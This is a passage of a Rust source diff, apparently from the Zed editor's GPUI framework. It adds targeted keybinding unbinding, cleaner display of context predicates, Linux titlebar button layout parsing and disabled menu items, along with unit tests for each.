+ assert!(fallback_bindings[0].action.partial_eq(&SecondaryTestAction));
+ }
- let tree = DispatchTree::new(keymap, Rc::new(registry));
+ #[test]
+ fn test_bindings_for_action_keeps_targeted_binding_outside_unbind_context() {
+ let tree = test_dispatch_tree(vec![
+ KeyBinding::new("tab", TestAction, Some("Editor")),
+ KeyBinding::new(
+ "tab",
+ Unbind("dispatch_test::TestAction".into()),
+ Some("Editor && edit_prediction"),
+ ),
+ KeyBinding::new(
+ "tab",
+ SecondaryTestAction,
+ Some("Editor && showing_completions"),
+ ),
+ ]);
let contexts = vec![
KeyContext::parse("Workspace").unwrap(),
- KeyContext::parse("ProjectPanel").unwrap(),
+ KeyContext::parse("Editor").unwrap(),
];
- let keybinding = tree.bindings_for_action(&TestAction, &contexts);
+ let bindings = tree.bindings_for_action(&TestAction, &contexts);
+ assert_eq!(bindings.len(), 1);
+ assert!(bindings[0].action.partial_eq(&TestAction));
- assert!(keybinding[0].action.partial_eq(&TestAction))
+ let highest = tree.highest_precedence_binding_for_action(&TestAction, &contexts);
+ assert!(highest.is_some_and(|binding| binding.action.partial_eq(&TestAction)));
}
#[test]
@@ -698,10 +731,7 @@ mod tests {
KeyBinding::new("space", TestAction, Some("ContextA")),
KeyBinding::new("space f g", TestAction, Some("ContextB")),
];
- let keymap = Rc::new(RefCell::new(Keymap::new(bindings)));
- let mut registry = ActionRegistry::default();
- registry.load_action::<TestAction>();
- let mut tree = DispatchTree::new(keymap, Rc::new(registry));
+ let mut tree = test_dispatch_tree(bindings);
type DispatchPath = SmallVec<[super::DispatchNodeId; 32]>;
fn dispatch(
@@ -4,7 +4,7 @@ mod context;
pub use binding::*;
pub use context::*;
-use crate::{Action, AsKeystroke, Keystroke, is_no_action};
+use crate::{Action, AsKeystroke, Keystroke, Unbind, is_no_action, is_unbind};
use collections::{HashMap, HashSet};
use smallvec::SmallVec;
use std::any::TypeId;
@@ -19,7 +19,7 @@ pub struct KeymapVersion(usize);
pub struct Keymap {
bindings: Vec<KeyBinding>,
binding_indices_by_action_id: HashMap<TypeId, SmallVec<[usize; 3]>>,
- no_action_binding_indices: Vec<usize>,
+ disabled_binding_indices: Vec<usize>,
version: KeymapVersion,
}
@@ -27,6 +27,26 @@ pub struct Keymap {
#[derive(Copy, Clone, Debug, Eq, PartialEq, Ord, PartialOrd)]
pub struct BindingIndex(usize);
+fn disabled_binding_matches_context(disabled_binding: &KeyBinding, binding: &KeyBinding) -> bool {
+ match (
+ &disabled_binding.context_predicate,
+ &binding.context_predicate,
+ ) {
+ (None, _) => true,
+ (Some(_), None) => false,
+ (Some(disabled_predicate), Some(predicate)) => disabled_predicate.is_superset(predicate),
+ }
+}
+
+fn binding_is_unbound(disabled_binding: &KeyBinding, binding: &KeyBinding) -> bool {
+ disabled_binding.keystrokes == binding.keystrokes
+ && disabled_binding
+ .action()
+ .as_any()
+ .downcast_ref::<Unbind>()
+ .is_some_and(|unbind| unbind.0.as_ref() == binding.action.name())
+}
+
impl Keymap {
/// Create a new keymap with the given bindings.
pub fn new(bindings: Vec<KeyBinding>) -> Self {
@@ -44,8 +64,8 @@ impl Keymap {
pub fn add_bindings<T: IntoIterator<Item = KeyBinding>>(&mut self, bindings: T) {
for binding in bindings {
let action_id = binding.action().as_any().type_id();
- if is_no_action(&*binding.action) {
- self.no_action_binding_indices.push(self.bindings.len());
+ if is_no_action(&*binding.action) || is_unbind(&*binding.action) {
+ self.disabled_binding_indices.push(self.bindings.len());
} else {
self.binding_indices_by_action_id
.entry(action_id)
@@ -62,7 +82,7 @@ impl Keymap {
pub fn clear(&mut self) {
self.bindings.clear();
self.binding_indices_by_action_id.clear();
- self.no_action_binding_indices.clear();
+ self.disabled_binding_indices.clear();
self.version.0 += 1;
}
@@ -90,21 +110,22 @@ impl Keymap {
return None;
}
- for null_ix in &self.no_action_binding_indices {
- if null_ix > ix {
- let null_binding = &self.bindings[*null_ix];
- if null_binding.keystrokes == binding.keystrokes {
- let null_binding_matches =
- match (&null_binding.context_predicate, &binding.context_predicate) {
- (None, _) => true,
- (Some(_), None) => false,
- (Some(null_predicate), Some(predicate)) => {
- null_predicate.is_superset(predicate)
- }
- };
- if null_binding_matches {
+ for disabled_ix in &self.disabled_binding_indices {
+ if disabled_ix > ix {
+ let disabled_binding = &self.bindings[*disabled_ix];
+ if disabled_binding.keystrokes != binding.keystrokes {
+ continue;
+ }
+
+ if is_no_action(&*disabled_binding.action) {
+ if disabled_binding_matches_context(disabled_binding, binding) {
return None;
}
+ } else if is_unbind(&*disabled_binding.action)
+ && disabled_binding_matches_context(disabled_binding, binding)
+ && binding_is_unbound(disabled_binding, binding)
+ {
+ return None;
}
}
}
@@ -170,6 +191,7 @@ impl Keymap {
let mut bindings: SmallVec<[_; 1]> = SmallVec::new();
let mut first_binding_index = None;
+ let mut unbound_bindings: Vec<&KeyBinding> = Vec::new();
for (_, ix, binding) in matched_bindings {
if is_no_action(&*binding.action) {
@@ -186,6 +208,19 @@ impl Keymap {
// For non-user NoAction bindings, continue searching for user overrides
continue;
}
+
+ if is_unbind(&*binding.action) {
+ unbound_bindings.push(binding);
+ continue;
+ }
+
+ if unbound_bindings
+ .iter()
+ .any(|disabled_binding| binding_is_unbound(disabled_binding, binding))
+ {
+ continue;
+ }
+
bindings.push(binding.clone());
first_binding_index.get_or_insert(ix);
}
@@ -197,7 +232,7 @@ impl Keymap {
{
continue;
}
- if is_no_action(&*binding.action) {
+ if is_no_action(&*binding.action) || is_unbind(&*binding.action) {
pending.remove(&&binding.keystrokes);
continue;
}
@@ -232,7 +267,10 @@ impl Keymap {
match pending {
None => None,
Some(is_pending) => {
- if !is_pending || is_no_action(&*binding.action) {
+ if !is_pending
+ || is_no_action(&*binding.action)
+ || is_unbind(&*binding.action)
+ {
return None;
}
Some((depth, BindingIndex(ix), binding))
@@ -256,7 +294,7 @@ impl Keymap {
mod tests {
use super::*;
use crate as gpui;
- use gpui::NoAction;
+ use gpui::{NoAction, Unbind};
actions!(
test_only,
@@ -720,6 +758,76 @@ mod tests {
}
}
+ #[test]
+ fn test_targeted_unbind_ignores_target_context() {
+ let bindings = [
+ KeyBinding::new("tab", ActionAlpha {}, Some("Editor")),
+ KeyBinding::new("tab", ActionBeta {}, Some("Editor && showing_completions")),
+ KeyBinding::new(
+ "tab",
+ Unbind("test_only::ActionAlpha".into()),
+ Some("Editor && edit_prediction"),
+ ),
+ ];
+
+ let mut keymap = Keymap::default();
+ keymap.add_bindings(bindings);
+
+ let (result, pending) = keymap.bindings_for_input(
+ &[Keystroke::parse("tab").unwrap()],
+ &[KeyContext::parse("Editor showing_completions edit_prediction").unwrap()],
+ );
+
+ assert!(!pending);
+ assert_eq!(result.len(), 1);
+ assert!(result[0].action.partial_eq(&ActionBeta {}));
+ }
+
+ #[test]
+ fn test_bindings_for_action_keeps_binding_for_narrower_targeted_unbind() {
+ let bindings = [
+ KeyBinding::new("tab", ActionAlpha {}, Some("Editor")),
+ KeyBinding::new(
+ "tab",
+ Unbind("test_only::ActionAlpha".into()),
+ Some("Editor && edit_prediction"),
+ ),
+ KeyBinding::new("tab", ActionBeta {}, Some("Editor && showing_completions")),
+ ];
+
+ let mut keymap = Keymap::default();
+ keymap.add_bindings(bindings);
+
+ assert_bindings(&keymap, &ActionAlpha {}, &["tab"]);
+ assert_bindings(&keymap, &ActionBeta {}, &["tab"]);
+
+ #[track_caller]
+ fn assert_bindings(keymap: &Keymap, action: &dyn Action, expected: &[&str]) {
+ let actual = keymap
+ .bindings_for_action(action)
+ .map(|binding| binding.keystrokes[0].inner().unparse())
+ .collect::<Vec<_>>();
+ assert_eq!(actual, expected, "{:?}", action);
+ }
+ }
+
+ #[test]
+ fn test_bindings_for_action_removes_binding_for_broader_targeted_unbind() {
+ let bindings = [
+ KeyBinding::new("tab", ActionAlpha {}, Some("Editor && edit_prediction")),
+ KeyBinding::new(
+ "tab",
+ Unbind("test_only::ActionAlpha".into()),
+ Some("Editor"),
+ ),
+ ];
+
+ let mut keymap = Keymap::default();
+ keymap.add_bindings(bindings);
+
+ assert!(keymap.bindings_for_action(&ActionAlpha {}).next().is_none());
+ }
+
#[test]
fn test_source_precedence_sorting() {
// KeybindSource precedence: User (0) > Vim (1) > Base (2) > Default (3)
@@ -199,13 +199,20 @@ pub enum KeyBindingContextPredicate {
impl fmt::Display for KeyBindingContextPredicate {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
- Self::Identifier(name) => write!(f, "{}", name),
- Self::Equal(left, right) => write!(f, "{} == {}", left, right),
- Self::NotEqual(left, right) => write!(f, "{} != {}", left, right),
- Self::Not(pred) => write!(f, "!{}", pred),
- Self::Descendant(parent, child) => write!(f, "{} > {}", parent, child),
- Self::And(left, right) => write!(f, "({} && {})", left, right),
- Self::Or(left, right) => write!(f, "({} || {})", left, right),
+ Self::Identifier(name) => write!(f, "{name}"),
+ Self::Equal(left, right) => write!(f, "{left} == {right}"),
+ Self::NotEqual(left, right) => write!(f, "{left} != {right}"),
+ Self::Descendant(parent, child) => write!(f, "{parent} > {child}"),
+ Self::Not(pred) => match pred.as_ref() {
+ Self::Identifier(name) => write!(f, "!{name}"),
+ _ => write!(f, "!({pred})"),
+ },
+ Self::And(..) => self.fmt_joined(f, " && ", LogicalOperator::And, |node| {
+ matches!(node, Self::Or(..))
+ }),
+ Self::Or(..) => self.fmt_joined(f, " || ", LogicalOperator::Or, |node| {
+ matches!(node, Self::And(..))
+ }),
}
}
}
@@ -436,6 +443,52 @@ impl KeyBindingContextPredicate {
anyhow::bail!("operands of != must be identifiers");
}
}
+
+ fn fmt_joined(
+ &self,
+ f: &mut fmt::Formatter<'_>,
+ separator: &str,
+ operator: LogicalOperator,
+ needs_parens: impl Fn(&Self) -> bool + Copy,
+ ) -> fmt::Result {
+ let mut first = true;
+ self.fmt_joined_inner(f, separator, operator, needs_parens, &mut first)
+ }
+
+ fn fmt_joined_inner(
+ &self,
+ f: &mut fmt::Formatter<'_>,
+ separator: &str,
+ operator: LogicalOperator,
+ needs_parens: impl Fn(&Self) -> bool + Copy,
+ first: &mut bool,
+ ) -> fmt::Result {
+ match (operator, self) {
+ (LogicalOperator::And, Self::And(left, right))
+ | (LogicalOperator::Or, Self::Or(left, right)) => {
+ left.fmt_joined_inner(f, separator, operator, needs_parens, first)?;
+ right.fmt_joined_inner(f, separator, operator, needs_parens, first)
+ }
+ (_, node) => {
+ if !*first {
+ f.write_str(separator)?;
+ }
+ *first = false;
+
+ if needs_parens(node) {
+ write!(f, "({node})")
+ } else {
+ write!(f, "{node}")
+ }
+ }
+ }
+ }
+}
+
+#[derive(Clone, Copy)]
+enum LogicalOperator {
+ And,
+ Or,
}
const PRECEDENCE_CHILD: u32 = 1;
@@ -757,4 +810,82 @@ mod tests {
assert!(not_workspace.eval(slice::from_ref(&editor_context)));
assert!(!not_workspace.eval(&workspace_pane_editor));
}
+
+ // MARK: - Display
+
+ #[test]
+ fn test_context_display() {
+ fn ident(s: &str) -> Box<KeyBindingContextPredicate> {
+ Box::new(Identifier(SharedString::new(s)))
+ }
+ fn eq(a: &str, b: &str) -> Box<KeyBindingContextPredicate> {
+ Box::new(Equal(SharedString::new(a), SharedString::new(b)))
+ }
+ fn not_eq(a: &str, b: &str) -> Box<KeyBindingContextPredicate> {
+ Box::new(NotEqual(SharedString::new(a), SharedString::new(b)))
+ }
+ fn and(
+ a: Box<KeyBindingContextPredicate>,
+ b: Box<KeyBindingContextPredicate>,
+ ) -> Box<KeyBindingContextPredicate> {
+ Box::new(And(a, b))
+ }
+ fn or(
+ a: Box<KeyBindingContextPredicate>,
+ b: Box<KeyBindingContextPredicate>,
+ ) -> Box<KeyBindingContextPredicate> {
+ Box::new(Or(a, b))
+ }
+ fn descendant(
+ a: Box<KeyBindingContextPredicate>,
+ b: Box<KeyBindingContextPredicate>,
+ ) -> Box<KeyBindingContextPredicate> {
+ Box::new(Descendant(a, b))
+ }
+ fn not(a: Box<KeyBindingContextPredicate>) -> Box<KeyBindingContextPredicate> {
+ Box::new(Not(a))
+ }
+
+ let test_cases = [
+ (ident("a"), "a"),
+ (eq("a", "b"), "a == b"),
+ (not_eq("a", "b"), "a != b"),
+ (descendant(ident("a"), ident("b")), "a > b"),
+ (not(ident("a")), "!a"),
+ (not_eq("a", "b"), "a != b"),
+ (descendant(ident("a"), ident("b")), "a > b"),
+ (not(and(ident("a"), ident("b"))), "!(a && b)"),
+ (not(or(ident("a"), ident("b"))), "!(a || b)"),
+ (and(ident("a"), ident("b")), "a && b"),
+ (and(and(ident("a"), ident("b")), ident("c")), "a && b && c"),
+ (or(ident("a"), ident("b")), "a || b"),
+ (or(or(ident("a"), ident("b")), ident("c")), "a || b || c"),
+ (or(ident("a"), and(ident("b"), ident("c"))), "a || (b && c)"),
+ (
+ and(
+ and(
+ and(ident("a"), eq("b", "c")),
+ not(descendant(ident("d"), ident("e"))),
+ ),
+ eq("f", "g"),
+ ),
+ "a && b == c && !(d > e) && f == g",
+ ),
+ (
+ and(and(ident("a"), or(ident("b"), ident("c"))), ident("d")),
+ "a && (b || c) && d",
+ ),
+ (
+ or(or(ident("a"), and(ident("b"), ident("c"))), ident("d")),
+ "a || (b && c) || d",
+ ),
+ ];
+
+ for (predicate, expected) in test_cases {
+ let actual = predicate.to_string();
+ assert_eq!(actual, expected);
+ let parsed = KeyBindingContextPredicate::parse(&actual).unwrap();
+ assert_eq!(parsed, *predicate);
+ }
+ }
}
@@ -37,6 +37,8 @@ use crate::{
ThreadTaskTimings, Window, WindowControlArea, hash, point, px, size,
};
use anyhow::Result;
+#[cfg(any(target_os = "linux", target_os = "freebsd"))]
+use anyhow::bail;
use async_task::Runnable;
use futures::channel::oneshot;
#[cfg(any(test, feature = "test-support"))]
@@ -78,6 +80,7 @@ pub use test::{TestDispatcher, TestScreenCaptureSource, TestScreenCaptureStream}
#[cfg(all(target_os = "macos", any(test, feature = "test-support")))]
pub use visual_test::VisualTestPlatform;
+// TODO(jk): return an enum instead of a string
/// Return which compositor we're guessing we'll use.
/// Does not attempt to connect to the given compositor.
#[cfg(any(target_os = "linux", target_os = "freebsd"))]
@@ -155,6 +158,11 @@ pub trait Platform: 'static {
/// Returns the appearance of the application's windows.
fn window_appearance(&self) -> WindowAppearance;
+ /// Returns the window button layout configuration when supported.
+ fn button_layout(&self) -> Option<WindowButtonLayout> {
+ None
+ }
+
fn open_url(&self, url: &str);
fn on_open_urls(&self, callback: Box<dyn FnMut(Vec<String>)>);
fn register_url_scheme(&self, url: &str) -> Task<Result<()>>;
@@ -406,6 +414,145 @@ impl Default for WindowControls {
}
}
+/// A window control button type used in [`WindowButtonLayout`].
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
+pub enum WindowButton {
+ /// The minimize button
+ Minimize,
+ /// The maximize button
+ Maximize,
+ /// The close button
+ Close,
+}
+
+impl WindowButton {
+ /// Returns a stable element ID for rendering this button.
+ pub fn id(&self) -> &'static str {
+ match self {
+ WindowButton::Minimize => "minimize",
+ WindowButton::Maximize => "maximize",
+ WindowButton::Close => "close",
+ }
+ }
+
+ #[cfg(any(target_os = "linux", target_os = "freebsd"))]
+ fn index(&self) -> usize {
+ match self {
+ WindowButton::Minimize => 0,
+ WindowButton::Maximize => 1,
+ WindowButton::Close => 2,
+ }
+ }
+}
+
+/// Maximum number of [`WindowButton`]s per side in the titlebar.
+pub const MAX_BUTTONS_PER_SIDE: usize = 3;
+
+/// Describes which [`WindowButton`]s appear on each side of the titlebar.
+///
+/// On Linux, this is read from the desktop environment's configuration
+/// (e.g. GNOME's `gtk-decoration-layout` gsetting) via [`WindowButtonLayout::parse`].
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub struct WindowButtonLayout {
+ /// Buttons on the left side of the titlebar.
+ pub left: [Option<WindowButton>; MAX_BUTTONS_PER_SIDE],
+ /// Buttons on the right side of the titlebar.
+ pub right: [Option<WindowButton>; MAX_BUTTONS_PER_SIDE],
+}
+
+#[cfg(any(target_os = "linux", target_os = "freebsd"))]
+impl WindowButtonLayout {
+ /// Returns Zed's built-in fallback button layout for Linux titlebars.
+ pub fn linux_default() -> Self {
+ Self {
+ left: [None; MAX_BUTTONS_PER_SIDE],
+ right: [
+ Some(WindowButton::Minimize),
+ Some(WindowButton::Maximize),
+ Some(WindowButton::Close),
+ ],
+ }
+ }
+
+ /// Parses a GNOME-style `button-layout` string (e.g. `"close,minimize:maximize"`).
+ pub fn parse(layout_string: &str) -> Result<Self> {
+ fn parse_side(
+ s: &str,
+ seen_buttons: &mut [bool; MAX_BUTTONS_PER_SIDE],
+ unrecognized: &mut Vec<String>,
+ ) -> [Option<WindowButton>; MAX_BUTTONS_PER_SIDE] {
+ let mut result = [None; MAX_BUTTONS_PER_SIDE];
+ let mut i = 0;
+ for name in s.split(',') {
+ let trimmed = name.trim();
+ if trimmed.is_empty() {
+ continue;
+ }
+ let button = match trimmed {
+ "minimize" => Some(WindowButton::Minimize),
+ "maximize" => Some(WindowButton::Maximize),
+ "close" => Some(WindowButton::Close),
+ other => {
+ unrecognized.push(other.to_string());
+ None
+ }
+ };
+ if let Some(button) = button {
+ if seen_buttons[button.index()] {
+ continue;
+ }
+ if let Some(slot) = result.get_mut(i) {
+ *slot = Some(button);
+ seen_buttons[button.index()] = true;
+ i += 1;
+ }
+ }
+ }
+ result
+ }
+
+ let (left_str, right_str) = layout_string.split_once(':').unwrap_or(("", layout_string));
+ let mut unrecognized = Vec::new();
+ let mut seen_buttons = [false; MAX_BUTTONS_PER_SIDE];
+ let layout = Self {
+ left: parse_side(left_str, &mut seen_buttons, &mut unrecognized),
+ right: parse_side(right_str, &mut seen_buttons, &mut unrecognized),
+ };
+
+ if !unrecognized.is_empty()
+ && layout.left.iter().all(Option::is_none)
+ && layout.right.iter().all(Option::is_none)
+ {
+ bail!(
+ "button layout string {:?} contains no valid buttons (unrecognized: {})",
+ layout_string,
+ unrecognized.join(", ")
+ );
+ }
+
+ Ok(layout)
+ }
+
+ /// Formats the layout back into a GNOME-style `button-layout` string.
+ #[cfg(test)]
+ pub fn format(&self) -> String {
+ fn format_side(buttons: &[Option<WindowButton>; MAX_BUTTONS_PER_SIDE]) -> String {
+ buttons
+ .iter()
+ .flatten()
+ .map(|button| match button {
+ WindowButton::Minimize => "minimize",
+ WindowButton::Maximize => "maximize",
+ WindowButton::Close => "close",
+ })
+ .collect::<Vec<_>>()
+ .join(",")
+ }
+
+ format!("{}:{}", format_side(&self.left), format_side(&self.right))
+ }
+}
+
/// A type to describe which sides of the window are currently tiled in some way
#[derive(Debug, Copy, Clone, Eq, PartialEq, Hash, Default)]
pub struct Tiling {
@@ -487,6 +634,7 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle {
fn on_hit_test_window_control(&self, callback: Box<dyn FnMut() -> Option<WindowControlArea>>);
fn on_close(&self, callback: Box<dyn FnOnce()>);
fn on_appearance_changed(&self, callback: Box<dyn FnMut()>);
+ fn on_button_layout_changed(&self, _callback: Box<dyn FnMut()>) {}
fn draw(&self, scene: &Scene);
fn completed_frame(&self) {}
fn sprite_atlas(&self) -> Arc<dyn PlatformAtlas>;
@@ -555,6 +703,20 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle {
}
}
+/// A renderer for headless windows that can produce real rendered output.
+#[cfg(any(test, feature = "test-support"))]
+pub trait PlatformHeadlessRenderer {
+ /// Render a scene and return the result as an RGBA image.
+ fn render_scene_to_image(
+ &mut self,
+ scene: &Scene,
+ size: Size<DevicePixels>,
+ ) -> Result<RgbaImage>;
+
+ /// Returns the sprite atlas used by this renderer.
+ fn sprite_atlas(&self) -> Arc<dyn PlatformAtlas>;
+}
+
/// Type alias for runnables with metadata.
/// Previously an enum with a single variant, now simplified to a direct type alias.
#[doc(hidden)]
@@ -573,6 +735,7 @@ pub trait PlatformDispatcher: Send + Sync {
fn dispatch(&self, runnable: RunnableVariant, priority: Priority);
fn dispatch_on_main_thread(&self, runnable: RunnableVariant, priority: Priority);
fn dispatch_after(&self, duration: Duration, runnable: RunnableVariant);
+
fn spawn_realtime(&self, f: Box<dyn FnOnce() + Send>);
fn now(&self) -> Instant {
@@ -592,19 +755,29 @@ pub trait PlatformDispatcher: Send + Sync {
#[expect(missing_docs)]
pub trait PlatformTextSystem: Send + Sync {
fn add_fonts(&self, fonts: Vec<Cow<'static, [u8]>>) -> Result<()>;
+ /// Get all available font names.
fn all_font_names(&self) -> Vec<String>;
+ /// Get the font ID for a font descriptor.
fn font_id(&self, descriptor: &Font) -> Result<FontId>;
+ /// Get metrics for a font.
fn font_metrics(&self, font_id: FontId) -> FontMetrics;
+ /// Get typographic bounds for a glyph.
fn typographic_bounds(&self, font_id: FontId, glyph_id: GlyphId) -> Result<Bounds<f32>>;
+ /// Get the advance width for a glyph.
fn advance(&self, font_id: FontId, glyph_id: GlyphId) -> Result<Size<f32>>;
+ /// Get the glyph ID for a character.
fn glyph_for_char(&self, font_id: FontId, ch: char) -> Option<GlyphId>;
+ /// Get raster bounds for a glyph.
fn glyph_raster_bounds(&self, params: &RenderGlyphParams) -> Result<Bounds<DevicePixels>>;
+ /// Rasterize a glyph.
fn rasterize_glyph(
&self,
params: &RenderGlyphParams,
raster_bounds: Bounds<DevicePixels>,
) -> Result<(Size<DevicePixels>, Vec<u8>)>;
+ /// Layout a line of text with the given font runs.
fn layout_line(&self, text: &str, font_size: Pixels, runs: &[FontRun]) -> LineLayout;
+ /// Returns the recommended text rendering mode for the given font and size.
fn recommended_rendering_mode(&self, _font_id: FontId, _font_size: Pixels)
-> TextRenderingMode;
}
@@ -1997,3 +2170,185 @@ impl From<String> for ClipboardString {
}
}
}
+
+#[cfg(all(test, any(target_os = "linux", target_os = "freebsd")))]
+mod tests {
+ use super::*;
+ use std::collections::HashSet;
+
+ #[test]
+ fn test_window_button_layout_parse_standard() {
+ let layout = WindowButtonLayout::parse("close,minimize:maximize").unwrap();
+ assert_eq!(
+ layout.left,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+ assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_right_only() {
+ let layout = WindowButtonLayout::parse("minimize,maximize,close").unwrap();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(
+ layout.right,
+ [
+ Some(WindowButton::Minimize),
+ Some(WindowButton::Maximize),
+ Some(WindowButton::Close)
+ ]
+ );
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_left_only() {
+ let layout = WindowButtonLayout::parse("close,minimize,maximize:").unwrap();
+ assert_eq!(
+ layout.left,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ Some(WindowButton::Maximize)
+ ]
+ );
+ assert_eq!(layout.right, [None, None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_with_whitespace() {
+ let layout = WindowButtonLayout::parse(" close , minimize : maximize ").unwrap();
+ assert_eq!(
+ layout.left,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+ assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_empty() {
+ let layout = WindowButtonLayout::parse("").unwrap();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(layout.right, [None, None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_intentionally_empty() {
+ let layout = WindowButtonLayout::parse(":").unwrap();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(layout.right, [None, None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_invalid_buttons() {
+ let layout = WindowButtonLayout::parse("close,invalid,minimize:maximize,foo").unwrap();
+ assert_eq!(
+ layout.left,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+ assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_deduplicates_same_side_buttons() {
+ let layout = WindowButtonLayout::parse("close,close,minimize").unwrap();
+ assert_eq!(
+ layout.right,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+ assert_eq!(layout.format(), ":close,minimize");
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_deduplicates_buttons_across_sides() {
+ let layout = WindowButtonLayout::parse("close:maximize,close,minimize").unwrap();
+ assert_eq!(layout.left, [Some(WindowButton::Close), None, None]);
+ assert_eq!(
+ layout.right,
+ [
+ Some(WindowButton::Maximize),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+
+ let button_ids: Vec<_> = layout
+ .left
+ .iter()
+ .chain(layout.right.iter())
+ .flatten()
+ .map(WindowButton::id)
+ .collect();
+ let unique_button_ids = button_ids.iter().copied().collect::<HashSet<_>>();
+ assert_eq!(unique_button_ids.len(), button_ids.len());
+ assert_eq!(layout.format(), "close:maximize,minimize");
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_gnome_style() {
+ let layout = WindowButtonLayout::parse("close").unwrap();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(layout.right, [Some(WindowButton::Close), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_elementary_style() {
+ let layout = WindowButtonLayout::parse("close:maximize").unwrap();
+ assert_eq!(layout.left, [Some(WindowButton::Close), None, None]);
+ assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_round_trip() {
+ let cases = [
+ "close:minimize,maximize",
+ "minimize,maximize,close:",
+ ":close",
+ "close:",
+ "close:maximize",
+ ":",
+ ];
+
+ for case in cases {
+ let layout = WindowButtonLayout::parse(case).unwrap();
+ assert_eq!(layout.format(), case, "Round-trip failed for: {}", case);
+ }
+ }
+
+ #[test]
+ fn test_window_button_layout_linux_default() {
+ let layout = WindowButtonLayout::linux_default();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(
+ layout.right,
+ [
+ Some(WindowButton::Minimize),
+ Some(WindowButton::Maximize),
+ Some(WindowButton::Close)
+ ]
+ );
+
+ let round_tripped = WindowButtonLayout::parse(&layout.format()).unwrap();
+ assert_eq!(round_tripped, layout);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_all_invalid() {
+ assert!(WindowButtonLayout::parse("asdfghjkl").is_err());
+ }
+}
@@ -7,14 +7,39 @@ pub struct Menu {
/// The items in the menu
pub items: Vec<MenuItem>,
+
+ /// Whether this menu is disabled
+ pub disabled: bool,
}
impl Menu {
+ /// Create a new Menu with the given name
+ pub fn new(name: impl Into<SharedString>) -> Self {
+ Self {
+ name: name.into(),
+ items: vec![],
+ disabled: false,
+ }
+ }
+
+ /// Set items to be in this menu
+ pub fn items(mut self, items: impl IntoIterator<Item = MenuItem>) -> Self {
+ self.items = items.into_iter().collect();
+ self
+ }
+
+ /// Set whether this menu is disabled
+ pub fn disabled(mut self, disabled: bool) -> Self {
+ self.disabled = disabled;
+ self
+ }
+
/// Create an OwnedMenu from this Menu
pub fn owned(self) -> OwnedMenu {
OwnedMenu {
name: self.name.to_string().into(),
items: self.items.into_iter().map(|item| item.owned()).collect(),
+ disabled: self.disabled,
}
}
}
@@ -72,6 +97,9 @@ pub enum MenuItem {
/// Whether this action is checked
checked: bool,
+
+ /// Whether this action is disabled
+ disabled: bool,
},
}
@@ -101,6 +129,7 @@ impl MenuItem {
action: Box::new(action),
os_action: None,
checked: false,
+ disabled: false,
}
}
@@ -115,6 +144,7 @@ impl MenuItem {
action: Box::new(action),
os_action: Some(os_action),
checked: false,
+ disabled: false,
}
}
@@ -128,11 +158,13 @@ impl MenuItem {
action,
os_action,
checked,
+ disabled,
} => OwnedMenuItem::Action {
name: name.into(),
action,
os_action,
checked,
+ disabled,
},
MenuItem::SystemMenu(os_menu) => OwnedMenuItem::SystemMenu(os_menu.owned()),
}
@@ -142,19 +174,49 @@ impl MenuItem {
///
/// Only for [`MenuItem::Action`], otherwise, will be ignored
pub fn checked(mut self, checked: bool) -> Self {
+ match &mut self {
+ MenuItem::Action { checked: old, .. } => {
+ *old = checked;
+ }
+ _ => {}
+ }
+ self
+ }
+
+ /// Returns whether this menu item is checked
+ ///
+ /// Only for [`MenuItem::Action`], otherwise, returns false
+ #[inline]
+ pub fn is_checked(&self) -> bool {
match self {
- MenuItem::Action {
- action,
- os_action,
- name,
- ..
- } => MenuItem::Action {
- name,
- action,
- os_action,
- checked,
- },
- _ => self,
+ MenuItem::Action { checked, .. } => *checked,
+ _ => false,
+ }
+ }
+
+ /// Set whether this menu item is disabled
+ pub fn disabled(mut self, disabled: bool) -> Self {
+ match &mut self {
+ MenuItem::Action { disabled: old, .. } => {
+ *old = disabled;
+ }
+ MenuItem::Submenu(submenu) => {
+ submenu.disabled = disabled;
+ }
+ _ => {}
+ }
+ self
+ }
+
+ /// Returns whether this menu item is disabled
+ ///
+ /// Only for [`MenuItem::Action`] and [`MenuItem::Submenu`], otherwise, returns false
+ #[inline]
+ pub fn is_disabled(&self) -> bool {
+ match self {
+ MenuItem::Action { disabled, .. } => *disabled,
+ MenuItem::Submenu(submenu) => submenu.disabled,
+ _ => false,
}
}
}
@@ -179,6 +241,9 @@ pub struct OwnedMenu {
/// The items in the menu
pub items: Vec<OwnedMenuItem>,
+
+ /// Whether this menu is disabled
+ pub disabled: bool,
}
/// The different kinds of items that can be in a menu
@@ -206,6 +271,9 @@ pub enum OwnedMenuItem {
/// Whether this action is checked
checked: bool,
+
+ /// Whether this action is disabled
+ disabled: bool,
},
}
@@ -219,11 +287,13 @@ impl Clone for OwnedMenuItem {
action,
